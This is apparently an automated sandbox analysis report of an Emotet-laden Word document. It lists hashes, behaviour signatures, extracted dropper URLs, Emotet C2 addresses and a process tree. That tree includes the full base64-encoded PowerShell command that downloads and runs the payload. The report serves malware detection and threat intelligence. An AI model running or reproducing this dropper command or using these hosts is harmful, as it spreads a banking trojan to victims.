Overview

overview

10

Static

static

8

emotet_doc

windows7_x64

10

Analysis

  • max time kernel
    28s
  • max time network
    36s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    29-07-2020 02:52

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    e8219ee2a83e2ef271cde4d0c44b37fa87484d4032593db4f7a004f9756226cb.doc

  • Size

    176KB

  • MD5

    1530ecc78572457ddc4ceb4cee9aca4c

  • SHA1

    0ba695b200051bdee8ff40b62a364b598325cc12

  • SHA256

    e8219ee2a83e2ef271cde4d0c44b37fa87484d4032593db4f7a004f9756226cb

  • SHA512

    cd9315c591faec226ec0ccb57a6c59ad19c40f895593889e9a2796853841d9854e5c8033c91319fbda58712f98762e9bfe4426a3ed4cad66a084f3047dd90450

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://fishbitedesign.com/delete_me/aq_no3_pixel079b/
exe.dropper

http://floridoweddings.com/wp-admin/1_fb_3rv7z6mr/
exe.dropper

http://floydswoodshop.com/floydswo/nn_g5_0s/
exe.dropper

http://fmcav.com/images/tihvt_5d_3znqq/
exe.dropper

http://goharm.com/wp-content/plugins/classic-editor/7b_k5_bo4lrnbmo6/

Extracted

Family

emotet

C2

76.27.179.47:80

212.51.142.238:8080

189.212.199.126:443

61.19.246.238:443

162.154.38.103:80

91.211.88.52:7080

83.110.223.58:443

124.45.106.173:443

116.203.32.252:8080

109.117.53.230:443

5.196.74.210:8080

75.139.38.211:80

168.235.67.138:7080

176.111.60.55:8080

169.239.182.217:8080

74.208.45.104:8080

31.31.77.83:443

222.214.218.37:4143

37.139.21.175:8080

91.205.215.66:443
rsa_pubkey.plain

Signatures

  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies registry class 280 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Executes dropped EXE 2 IoCs
  • Emotet Payload 1 IoCs

    Detects Emotet payload in memory.

  • Drops file in System32 directory 2 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e8219ee2a83e2ef271cde4d0c44b37fa87484d4032593db4f7a004f9756226cb.doc"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    PID:1496
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABBAE4ATABWAE4AaQBmAHoAPQAnAEoAQgBXAE4AUQBpAGUAZAAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBTAEUAQwB1AHIAYABpAGAAVABZAFAAUgBPAHQAbwBjAG8ATAAiACAAPQAgACcAdABsAHMAMQAyACwAIAB0AGwAcwAxADEALAAgAHQAbABzACcAOwAkAEcATQBCAFcASQBtAGsAawAgAD0AIAAnADIAMgA3ACcAOwAkAFYAWABZAEUARgB3AHcAcQA9ACcASQBUAEUASwBVAHUAdgBsACcAOwAkAE0AUwBSAEsASgB1AGQAdgA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARwBNAEIAVwBJAG0AawBrACsAJwAuAGUAeABlACcAOwAkAFEARgBKAEUASwBoAHQAdAA9ACcAVABXAFMAUwBFAGcAbABwACcAOwAkAFcAQgBWAE0ASABqAHAAeQA9AC4AKAAnAG4AZQAnACsAJwB3ACcAKwAnAC0AbwBiAGoAZQBjACcAKwAnAHQAJwApACAATgBlAHQALgBXAEUAYgBjAGwAaQBlAG4AdAA7ACQARgBHAFQASABBAGEAZABkAD0AJwBoAHQAdABwADoALwAvAGYAaQBzAGgAYgBpAHQAZQBkAGUAcwBpAGcAbgAuAGMAbwBtAC8AZABlAGwAZQB0AGUAXwBtAGUALwBhAHEAXwBuAG8AMwBfAHAAaQB4AGUAbAAwADcAOQBiAC8AKgBoAHQAdABwADoALwAvAGYAbABvAHIAaQBkAG8AdwBlAGQAZABpAG4AZwBzAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwAxAF8AZgBiAF8AMwByAHYANwB6ADYAbQByAC8AKgBoAHQAdABwADoALwAvAGYAbABvAHkAZABzAHcAbwBvAGQAcwBoAG8AcAAuAGMAbwBtAC8AZgBsAG8AeQBkAHMAdwBvAC8AbgBuAF8AZwA1AF8AMABzAC8AKgBoAHQAdABwADoALwAvAGYAbQBjAGEAdgAuAGMAbwBtAC8AaQBtAGEAZwBlAHMALwB0AGkAaAB2AHQAXwA1AGQAXwAzAHoAbgBxAHEALwAqAGgAdAB0AHAAOgAvAC8AZwBvAGgAYQByAG0ALgBjAG8AbQAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwBwAGwAdQBnAGkAbgBzAC8AYwBsAGEAcwBzAGkAYwAtAGUAZABpAHQAbwByAC8ANwBiAF8AawA1AF8AYgBvADQAbAByAG4AYgBtAG8ANgAvACcALgAiAFMAcABsAGAASQB0ACIAKABbAGMAaABhAHIAXQA0ADIAKQA7ACQAQwBJAEcAWgBSAHIAcwBxAD0AJwBGAFIAQgBUAFUAeABrAG0AJwA7AGYAbwByAGUAYQBjAGgAKAAkAEYAQgBRAFUARgBpAHcAeQAgAGkAbgAgACQARgBHAFQASABBAGEAZABkACkAewB0AHIAeQB7ACQAVwBCAFYATQBIAGoAcAB5AC4AIgBkAE8AVwBOAEwAbwBhAGAAZABGAGAAaQBgAGwAZQAiACgAJABGAEIAUQBVAEYAaQB3AHkALAAgACQATQBTAFIASwBKAHUAZAB2ACkAOwAkAFAAUQBOAFIASwBtAG8AZAA9ACcAVQBQAE8AWABaAGYAZQB0ACcAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlAHQALQAnACsAJwBJAHQAZQBtACcAKQAgACQATQBTAFIASwBKAHUAZAB2ACkALgAiAGwARQBgAE4ARwBUAEgAIgAgAC0AZwBlACAAMgAyADEAMAA5ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBjAFIAYABlAGEAdABlACIAKAAkAE0AUwBSAEsASgB1AGQAdgApADsAJABRAE4AUwBMAFQAbgBvAGMAPQAnAEEAQwBWAEkAUwBnAHYAeQAnADsAYgByAGUAYQBrADsAJABMAFkAVQBMAE8AeAB5AGEAPQAnAEgAUwBXAE8AQQB1AHgAdgAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABYAEYAVQBEAFYAagBoAGQAPQAnAFkASABXAFIARABnAGIAaQAnAA==
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Blacklisted process makes network request
    • Suspicious use of AdjustPrivilegeToken
    • Drops file in System32 directory
    • Process spawned unexpected child process
    PID:1776
  • C:\Users\Admin\227.exe
    C:\Users\Admin\227.exe
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    • Executes dropped EXE
    • Drops file in System32 directory
    PID:1388
    • C:\Windows\SysWOW64\NlsLexicons081a\psr.exe
      "C:\Windows\SysWOW64\NlsLexicons081a\psr.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      PID:1748

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1388-12-0x0000000000260000-0x000000000026C000-memory.dmp

    Filesize

    48KB

    Download

  • memory/1496-0-0x00000000068A0000-0x00000000069A0000-memory.dmp

    Filesize

    1024KB

    Download

  • memory/1496-2-0x00000000088F0000-0x00000000088F4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1496-5-0x000000000A940000-0x000000000A944000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1496-6-0x000000000B9C0000-0x000000000B9C4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1496-7-0x0000000006BF0000-0x0000000006DF0000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1496-8-0x0000000006BF0000-0x0000000006DF0000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/1496-9-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

    Download